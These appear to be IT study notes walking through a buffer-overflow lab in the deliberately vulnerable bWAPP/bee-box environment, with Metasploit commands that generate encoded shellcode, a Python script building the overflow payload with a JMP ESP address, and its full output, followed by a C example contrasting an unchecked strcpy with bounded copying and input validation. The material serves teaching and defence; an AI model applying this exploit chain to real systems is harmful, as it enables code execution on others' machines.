IT study notes
12. A9 – Using Known Vulnerable Components
● Buffer Overflow (Local)
## bwapp
HINT: \x90*354 + \x8f\x92\x04\x08 + [payload]
\x8f\x92\x04\x08: address of a JMP ESP instruction; jumping there executes the payload that follows it
## bee-box
# gedit bof_1.php
echo shell_exec("./apps/movie_search " . $title);
=> identify the program the page calls internally
# ls -l ./apps/movie_search
=> this program misbehaves once the input reaches 354 bytes or more
## kali
# msfdb init
# msfconsole
msf > use linux/x86/exec
msf payload(exec) > show options
msf payload(exec) > set cmd /bin/ps
msf5 payload(linux/x86/exec) > generate -b '\x00' -e x86/opt_sub -f raw -o /tmp/payload.txt
[*] Writing 205 bytes to /tmp/payload.txt...
msf payload(exec) > exit
=> Metasploit generates the machine code for us
=> '-b \x00': declares \x00 a bad character, i.e. asks the encoder not to emit it
# cat /tmp/payload.txt => inspect the output
# { echo -n \'; cat /tmp/payload.txt; echo -n \'; } | perl -pe's/(.)/sprintf("%%%02x", ord($1))/seg'
%27%54%58%2d%05%fd%fd%fd%2d%01%01%01%01%2d%01%01%01%01%50%5c%25%01%01%01%01%25%02%02%02%02%2d%75%1c%30%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%14%df%74%2b%2d%01%01%01%01%2d%01%01%01%01%50%2d%08%90%25%e1%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%6c%fe%0b%2d%01%01%01%01%2d%01%01%01%01%50%2d%ac%15%24%60%2d%01%01%01%01%2d%01%01%01%01%50%2d%e7%77%7d%1a%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%04%58%7f%2d%01%01%01%01%2d%01%01%01%01%50%2d%96%36%ba%f7%2d%01%01%01%01%2d%01%01%01%01%50%2d%39%ca%e7%7e%2d%01%01%01%01%2d%01%01%01%01%50%2d%92%0e%21%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%07%e6%58%0e%2d%01%01%01%01%2d%01%01%01%01%50%27
# /home/kali/gedit test.py
dummy = '%41' * 354
jmpesp = '%8f%92%04%08'
shellcode = '%27%54%58%2d%05%fd%fd%fd%2d%01%01%01%01%2d%01%01%01%01%50%5c%25%01%01%01%01%25%02%02%02%02%2d%75%1c%30%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%14%df%74%2b%2d%01%01%01%01%2d%01%01%01%01%50%2d%08%90%25%e1%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%6c%fe%0b%2d%01%01%01%01%2d%01%01%01%01%50%2d%ac%15%24%60%2d%01%01%01%01%2d%01%01%01%01%50%2d%e7%77%7d%1a%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%04%58%7f%2d%01%01%01%01%2d%01%01%01%01%50%2d%96%36%ba%f7%2d%01%01%01%01%2d%01%01%01%01%50%2d%39%ca%e7%7e%2d%01%01%01%01%2d%01%01%01%01%50%2d%92%0e%21%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%07%e6%58%0e%2d%01%01%01%01%2d%01%01%01%01%50%27'
payload = shellcode[:3] + dummy + jmpesp + shellcode[3:]
print(payload)
=> '%41' * 354: put in 354 'A' characters (0x41); the challenge hint gives 354
=> shellcode[:3]: %27 (the opening single quote)
=> dummy: 354 'A's
=> jmpesp: the return address (overwrites the saved EIP)
=> shellcode[3:]: %54 through the final %27
=> in payload = shellcode[:3] + dummy + jmpesp + shellcode[3:], shellcode[:3] is placed first because %27 is the single quote (') that opens the shell argument
# python test.py
%27%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%8f%92%04%08%54%58%2d%05%fd%fd%fd%2d%01%01%01%01%2d%01%01%01%01%50%5c%25%01%01%01%01%25%02%02%02%02%2d%75%1c%30%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%14%df%74%2b%2d%01%01%01%01%2d%01%01%01%01%50%2d%08%90%25%e1%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%6c%fe%0b%2d%01%01%01%01%2d%01%01%01%01%50%2d%ac%15%24%60%2d%01%01%01%01%2d%01%01%01%01%50%2d%e7%77%7d%1a%2d%01%01%01%01%2d%01%01%01%01%50%2d%67%04%58%7f%2d%01%01%01%01%2d%01%01%01%01%50%2d%96%36%ba%f7%2d%01%01%01%01%2d%01%01%01%01%50%2d%39%ca%e7%7e%2d%01%01%01%01%2d%01%01%01%01%50%2d%92%0e%21%7d%2d%01%01%01%01%2d%01%01%01%01%50%2d%07%e6%58%0e%2d%01%01%01%01%2d%01%01%01%01%50%27
=> all of this exists to execute the command set earlier with msf payload(exec) > set cmd /bin/ps // confirm that the ps output (pid listing) appears
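The walkthrough shows that bof_1.php hands an unchecked title to a native helper that breaks at 354 bytes. The following is an added example, not bWAPP's or bee-box's own code, showing the defect class beside the input checks a wrapper should run first; the functions copy_title_checked, title_is_printable and validate_title and the 256-byte TITLE_MAX are assumptions, since the real movie_search source is not on the page.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

#define TITLE_MAX 256   /* assumed buffer size; the real binary is not on the page */

/* The defect class the walkthrough exploits: a fixed-size stack buffer
 * filled with strcpy(), which never checks the destination capacity, so
 * a title longer than the buffer overwrites the saved EBP/EIP above it.
 * Shown only for comparison; the checked version below is what to ship. */
void copy_title_unsafe(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened form: refuse, rather than truncate, anything that does not fit.
 * Returns 0 on success, -1 when src (plus its NUL) would exceed dstsz. */
int copy_title_checked(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    while (n < dstsz && src[n] != '\0')   /* bounded scan, never past dstsz */
        n++;
    if (n == dstsz)                       /* no room for the terminating NUL */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Second layer: a movie title has no business carrying raw bytes such as
 * the 0x8f 0x92 0x04 0x08 return address or encoded shellcode, so accept
 * printable ASCII only. Returns 1 if every byte is acceptable, else 0. */
int title_is_printable(const char *src)
{
    for (const unsigned char *p = (const unsigned char *)src; *p; p++)
        if (*p < 0x20 || *p > 0x7e)
            return 0;
    return 1;
}

/* What a wrapper such as bof_1.php should establish before passing the
 * title to a native helper: 0 = accept, -1 = too long, -2 = bad bytes. */
int validate_title(const char *src)
{
    char buf[TITLE_MAX];
    if (copy_title_checked(buf, sizeof buf, src) != 0)
        return -1;
    return title_is_printable(buf) ? 0 : -2;
}
```

With these checks in front of shell_exec, the 354-byte filler from the hint is rejected on length alone, and the JMP ESP address bytes are rejected on content even when short.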